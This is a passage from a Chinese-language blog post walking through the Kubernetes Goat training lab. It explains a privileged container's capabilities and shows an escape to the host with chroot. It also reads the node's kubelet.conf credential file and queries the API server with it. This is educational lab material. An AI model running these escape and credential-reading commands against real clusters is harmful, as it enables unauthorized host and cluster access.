<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">Current: =ep</span><br><span class="line">Bounding <span class="built_in">set</span> =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore</span><br><span class="line">Ambient <span class="built_in">set</span> =</span><br><span class="line">Current IAB:</span><br><span class="line">Securebits: 00/0x0/1<span class="string">&#x27;b0 (no-new-privs=0)</span></span><br><span class="line"><span class="string"> secure-noroot: no (unlocked)</span></span><br><span class="line"><span class="string"> secure-no-suid-fixup: no (unlocked)</span></span><br><span class="line"><span class="string"> secure-keep-caps: no (unlocked)</span></span><br><span class="line"><span class="string"> secure-no-ambient-raise: no (unlocked)</span></span><br><span class="line"><span class="string">uid=0(root) euid=0(root)</span></span><br><span class="line"><span class="string">gid=0(root)</span></span><br><span class="line"><span class="string">groups=0(root)</span></span><br><span class="line"><span class="string">Guessed mode: HYBRID (4)</span></span><br></pre></td></tr></table></figure>
<p>直接分析这个返回的结果：</p>
<p><strong>1、<code>Current: =ep</code></strong></p>
<p>这表示当前进程的 capability 集合里，启用了 <code>effective</code> 和 <code>permitted</code>。</p>
<p>简单理解：</p>
<ul>
<li><code>permitted (p)</code>：允许你拥有这些能力</li>
<li><code>effective (e)</code>：这些能力当前正在生效，可以直接用</li>
</ul>
<p>这里显示成 <code>=ep</code>，但没有逐个展开，通常表示当前有效能力集合非常大，结合下面的 <code>Bounding set</code> 看，基本就是拿到了大量高权限能力。</p>
<p><strong>2、<code>Bounding set = ...</code></strong></p>
<p>这一行最关键，表示当前进程“最多还能拥有的 capabilities 上限”。</p>
<p>你这里的 <code>Bounding set</code> 非常大，包含了大量高危能力，例如：</p>
<ul>
<li><code>cap_net_admin</code> 可管理网络配置，比如网卡、路由、防火墙等</li>
<li><code>cap_net_raw</code> 可使用原始套接字，比如抓包、构造特殊网络报文</li>
<li><code>cap_sys_ptrace</code> 可调试/跟踪其他进程</li>
<li><code>cap_sys_module</code> 可装载/卸载内核模块</li>
<li><code>cap_sys_admin</code> 这是最危险的一类之一，常被称为“准 root 能力大礼包” 它覆盖面极广，很多敏感系统操作都和它有关</li>
<li><code>cap_sys_rawio</code> 可进行底层原始 I/O 操作</li>
<li><code>cap_sys_boot</code> 可执行系统启动/重启相关操作</li>
<li><code>cap_mknod</code> 可创建设备文件</li>
<li><code>cap_bpf</code> 可使用 eBPF 相关能力</li>
<li><code>cap_checkpoint_restore</code> 和进程恢复、命名空间等高级操作有关</li>
</ul>
<p>这说明什么？</p>
<p>说明这个进程的权限不是普通容器默认权限，而是非常接近宿主机高权限进程。</p>
<p>正常、受限的容器通常不会有这么完整的一串能力，尤其不会轻易拿到：</p>
<ul>
<li><code>cap_sys_admin</code></li>
<li><code>cap_sys_module</code></li>
<li><code>cap_sys_ptrace</code></li>
<li><code>cap_bpf</code></li>
<li><code>cap_net_admin</code></li>
</ul>
<p><strong>3. <code>Ambient set =</code></strong></p>
<p>这是空的，表示 ambient capabilities 没有设置。</p>
<p>这通常不是重点问题。<br>
空并不代表权限低，因为你前面的 <code>effective/permitted/bounding</code> 已经非常高了。</p>
<p><strong>4. <code>Current IAB:</code></strong></p>
<p>这里没展开出更多内容，一般表示当前 inheritable/ambient/bounding 相关状态没有额外信息值得展示。</p>
<p>重点仍然是前面的能力集。</p>
<p><strong>5. <code>Securebits: 00/0x0/1'b0 (no-new-privs=0)</code></strong></p>
<p>这一段表示安全位设置。</p>
<p>其中最值得关注的是：</p>
<ul>
<li><code>no-new-privs=0</code></li>
</ul>
<p>意思是：</p>
<p>当前进程没有开启 <code>no_new_privs</code> 限制。</p>
<p>简单理解：</p>
<ul>
<li>如果 <code>no_new_privs=1</code>，进程后续执行程序时，不能再通过 <code>setuid</code>、文件 capability 等方式获得额外权限</li>
<li>现在是 <code>0</code>，说明没有这个保护限制</li>
</ul>
<p>也就是说，从防守角度看，这也是偏危险的信号。</p>
<p>下面几项：</p>
<ul>
<li><code>secure-noroot: no</code></li>
<li><code>secure-no-suid-fixup: no</code></li>
<li><code>secure-keep-caps: no</code></li>
<li><code>secure-no-ambient-raise: no</code></li>
</ul>
<p>都表示这些更严格的安全约束没有启用，整体上是比较“宽松”的高权限状态。</p>
<p><strong>6. <code>uid=0(root) euid=0(root)</code></strong></p>
<p>这表示当前用户身份就是 <code>root</code>：</p>
<ul>
<li><code>uid=0</code>：真实用户 ID 是 root</li>
<li><code>euid=0</code>：有效用户 ID 也是 root</li>
</ul>
<p>这意味着当前进程不是普通用户，而是以 root 身份运行。</p>
<p><strong>7. <code>gid=0(root)</code> / <code>groups=0(root)</code></strong></p>
<p>这表示组身份也是 root 组。</p>
<h4 id="mount">mount</h4>
<p><code>mount</code>查看文件的挂载，输出结果太长了，这里忽略。</p>
<p><code>ls -al</code>查看当前的目录。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312012347600.png" alt="image-20260312012347600"></p>
<p>注意到了<code>/host-system</code>目录。</p>
<h3 id="获取主机权限">获取主机权限</h3>
<p>使用<code>chroot</code>获取主机的权限，<code>chroot /host-system bash</code>。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312012634952.png" alt="image-20260312012634952"></p>
<p>访问所有主机系统资源，例如 Docker 容器、配置等。命令<code>crictl pods</code>。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312013404077.png" alt="image-20260312013404077"></p>
<p>执行<code>ctr -n k8s.io containers list</code></p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312013726678.png" alt="image-20260312013726678"></p>
<h3 id="获取与Kubernetes节点相同的权限">获取与Kubernetes节点相同的权限</h3>
<p>Kubernetes 节点配置位于默认路径，节点级 kubelet 使用该路径与 Kubernetes API 服务器通信。如果您可以使用此配置，您将获得与 Kubernetes 节点相同的权限。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /etc/kubernetes/kubelet.conf</span><br></pre></td></tr></table></figure>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312094653233.png" alt="image-20260312094653233"></p>
<p>可以使用 <code>kubectl</code> 命令，利用已获得的配置来探索其他资源。</p>
<p>执行命令<code>kubectl --kubeconfig /etc/kubernetes/kubelet.conf get all -n kube-system</code>。</p>
<p>用 <code>/etc/kubernetes/kubelet.conf</code> 里的认证身份连接 Kubernetes API Server，查看 <code>kube-system</code> 命名空间中的常见资源对象</p>
<p>输出的结果为：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">root@system-monitor-deployment-866f697c75-2wzd4:/# kubectl --kubeconfig /etc/kubernetes/kubelet.conf get all -n kube-system</span><br><span class="line">NAME       TYPE        CLUSTER-IP   EXTERNAL-IP   PORT(S)                  AGE</span><br><span class="line">kube-dns   ClusterIP   10.96.0.10   &lt;none&gt;        53/UDP,53/TCP,9153/TCP   3d18h</span><br><span class="line">Error from server (Forbidden): pods is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;pods&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span>: can only list/watch pods with spec.nodeName field selector</span><br><span class="line">Error from server (Forbidden): replicationcontrollers is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;replicationcontrollers&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): daemonsets.apps is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;daemonsets&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;apps&quot;</span> inthe namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): deployments.apps is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;deployments&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;apps&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): replicasets.apps is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;replicasets&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;apps&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): statefulsets.apps is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;statefulsets&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;apps&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): horizontalpodautoscalers.autoscaling is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;horizontalpodautoscalers&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;autoscaling&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): cronjobs.batch is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;cronjobs&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;batch&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br><span class="line">Error from server (Forbidden): jobs.batch is forbidden: User <span class="string">&quot;system:node:my-k8s-lab-worker&quot;</span> cannot list resource <span class="string">&quot;jobs&quot;</span> <span class="keyword">in</span> API group <span class="string">&quot;batch&quot;</span> <span class="keyword">in</span> the namespace <span class="string">&quot;kube-system&quot;</span></span><br></pre></td></tr></table></figure>
<p>拿 kubelet 这份配置文件里的身份，去查 Kubernetes 系统命名空间里有哪些常见资源，发现连上了 API Server，但当前身份是节点身份 <code>system:node:my-k8s-lab-worker</code>，它只有受限权限，所以只能看到一部分资源，其他资源被 RBAC 拒绝了。</p>
<p>下面再看其它的信息，执行<code>kubectl --kubeconfig /etc/kubernetes/kubelet.conf get nodes</code>。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312101443417.png" alt="image-20260312101443417"></p>
<p>你当前使用的是节点 <code>my-k8s-lab-worker</code> 的 kubelet 身份，这个身份可以连接 Kubernetes API，但它没有权限列出全体节点，只允许访问它自己的 Node 对象。</p>
<h2 id="五、Docker-CIS-benchmarks-analysis">五、Docker CIS benchmarks analysis</h2>
<h2 id="六、Kubernetes-CIS-benchmarks-analysis">六、Kubernetes CIS benchmarks analysis</h2>
<h2 id="七、Attacking-private-registry">七、Attacking private registry</h2>
<h2 id="八、NodePort-exposed-services">八、NodePort exposed services</h2>
<h2 id="九、Analyzing-crypto-miner-container">九、Analyzing crypto miner container</h2>
<h2 id="十、Kubernetes-namespaces-bypass">十、Kubernetes namespaces bypass</h2>
<h2 id="十一、Gaining-environment-information">十一、Gaining environment information</h2>
<h2 id="十二、DoS-the-Memory-CPU-resources">十二、DoS the Memory/CPU resources</h2>
<h2 id="十三、Hacker-container-preview">十三、Hacker container preview</h2>
<h2 id="十四、Hidden-in-layers">十四、Hidden in layers</h2>
<h2 id="十五、RBAC-least-privileges-misconfiguration">十五、RBAC least privileges misconfiguration</h2>
<h2 id="十六、KubeAudit-Audit-Kubernetes-clusters">十六、KubeAudit - Audit Kubernetes clusters</h2>
<h2 id="十七、Falco-Runtime-security-monitoring-detection">十七、Falco - Runtime security monitoring &amp; detection</h2>
<h2 id="十八、Popeye-A-Kubernetes-cluster-sanitizer">十八、Popeye - A Kubernetes cluster sanitizer</h2>
<h2 id="十九、Secure-network-boundaries-using-NSP">十九、Secure network boundaries using NSP</h2>
<h2 id="二十、Cilium-Tetragon-eBPF-based-Security-Observability-and-Runtime-Enforcement">二十、Cilium Tetragon - eBPF-based Security Observability and Runtime Enforcement</h2>
<h2 id="二十一、Securing-Kubernetes-Clusters-using-Kyverno-Policy-Engine">二十一、Securing Kubernetes Clusters using Kyverno Policy Engine</h2>
<h2 id="参考">参考</h2>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>k8s goat靶场 <a target="_blank" rel="noopener" href="https://github.com/madhuakula/kubernetes-goat">https://github.com/madhuakula/kubernetes-goat</a> <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>crictl工具 <a target="_blank" rel="noopener" href="https://github.com/kubernetes-sigs/cri-tools/releases">https://github.com/kubernetes-sigs/cri-tools/releases</a> <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>EXPLOIT_CONTAINERD_SOCK <a target="_blank" rel="noopener" href="https://kubehound.io/reference/attacks/EXPLOIT_CONTAINERD_SOCK/">https://kubehound.io/reference/attacks/EXPLOIT_CONTAINERD_SOCK/</a> <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2026/03/08/Kubernetes-K8s-%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2026-03-12 10:16:46
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/Kubernetes/" title="Kubernetes">
                        #Kubernetes
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/" title="容器逃逸">
                        #容器逃逸
                      </a>
                    </span>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" title="云安全">
                        #云安全
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="Categories"></i>
                    
                    <span class="span--category">
                      <a href="/categories/Web%E5%AE%89%E5%85%A8/" title="Web安全">
                        <b>#</b> Web安全
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81Sensitive-keys-in-codebases"><span class="toc-text">一、Sensitive keys in codebases</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#git%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-text">.git信息泄露</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81DIND-docker-in-docker-exploitation"><span class="toc-text">二、DIND (docker-in-docker) exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5"><span class="toc-text">命令注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8%EF%BC%8C%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-text">容器逃逸，横向移动</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81SSRF-in-the-Kubernetes-K8S-world"><span class="toc-text">三、SSRF in the Kubernetes (K8S) world</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%8E%A2%E6%B5%8B"><span class="toc-text">内网探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ServiceAccount-token"><span class="toc-text">ServiceAccount token</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8B%93%E5%B1%95"><span class="toc-text">拓展</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%E3%80%81Container-escape-to-the-host-system"><span class="toc-text">四、Container escape to the host system</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E5%AE%B9%E5%99%A8%E7%9A%84%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF"><span class="toc-text">查看容器的配置信息</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#capsh-print"><span class="toc-text">capsh --print</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#mount"><span class="toc-text">mount</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E4%B8%BB%E6%9C%BA%E6%9D%83%E9%99%90"><span class="toc-text">获取主机权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E4%B8%8EKubernetes%E8%8A%82%E7%82%B9%E7%9B%B8%E5%90%8C%E7%9A%84%E6%9D%83%E9%99%90"><span class="toc-text">获取与Kubernetes节点相同的权限</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81Docker-CIS-benchmarks-analysis"><span class="toc-text">五、Docker CIS benchmarks analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD%E3%80%81Kubernetes-CIS-benchmarks-analysis"><span class="toc-text">六、Kubernetes CIS benchmarks analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83%E3%80%81Attacking-private-registry"><span class="toc-text">七、Attacking private registry</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AB%E3%80%81NodePort-exposed-services"><span class="toc-text">八、NodePort exposed services</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B9%9D%E3%80%81Analyzing-crypto-miner-container"><span class="toc-text">九、Analyzing crypto miner container</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E3%80%81Kubernetes-namespaces-bypass"><span class="toc-text">十、Kubernetes namespaces bypass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%B8%80%E3%80%81Gaining-environment-information"><span class="toc-text">十一、Gaining environment information</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%BA%8C%E3%80%81DoS-the-Memory-CPU-resources"><span class="toc-text">十二、DoS the Memory&#x2F;CPU resources</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%B8%89%E3%80%81Hacker-container-preview"><span class="toc-text">十三、Hacker container preview</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E5%9B%9B%E3%80%81Hidden-in-layers"><span class="toc-text">十四、Hidden in layers</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%BA%94%E3%80%81RBAC-least-privileges-misconfiguration"><span class="toc-text">十五、RBAC least privileges misconfiguration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E5%85%AD%E3%80%81KubeAudit-Audit-Kubernetes-clusters"><span class="toc-text">十六、KubeAudit - Audit Kubernetes clusters</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%B8%83%E3%80%81Falco-Runtime-security-monitoring-detection"><span class="toc-text">十七、Falco - Runtime security monitoring &amp; detection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E5%85%AB%E3%80%81Popeye-A-Kubernetes-cluster-sanitizer"><span class="toc-text">十八、Popeye - A Kubernetes cluster sanitizer</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%81%E4%B9%9D%E3%80%81Secure-network-boundaries-using-NSP"><span class="toc-text">十九、Secure network boundaries using NSP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E5%8D%81%E3%80%81Cilium-Tetragon-eBPF-based-Security-Observability-and-Runtime-Enforcement"><span class="toc-text">二十、Cilium Tetragon - eBPF-based Security Observability and Runtime Enforcement</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E5%8D%81%E4%B8%80%E3%80%81Securing-Kubernetes-Clusters-using-Kyverno-Policy-Engine"><span class="toc-text">二十一、Securing Kubernetes Clusters using Kyverno Policy Engine</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-text">参考</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/x2nn">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="https://x2nn.github.io">Copyright © 2024 - 2026</a>
        
    </div>
  
  
    <div class="footer-views">
      
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
          本站访客数<span id="busuanzi_value_site_uv"></span>人
        
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + k8s%20goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0 + '&url=' + https%3A%2F%2Fx2nn.github.io%2F2026%2F03%2F11%2Fk8s-goat%25E9%259D%25B6%25E5%259C%25BA%25E7%25BB%2583%25E4%25B9%25A0%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://x2nn.github.io/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
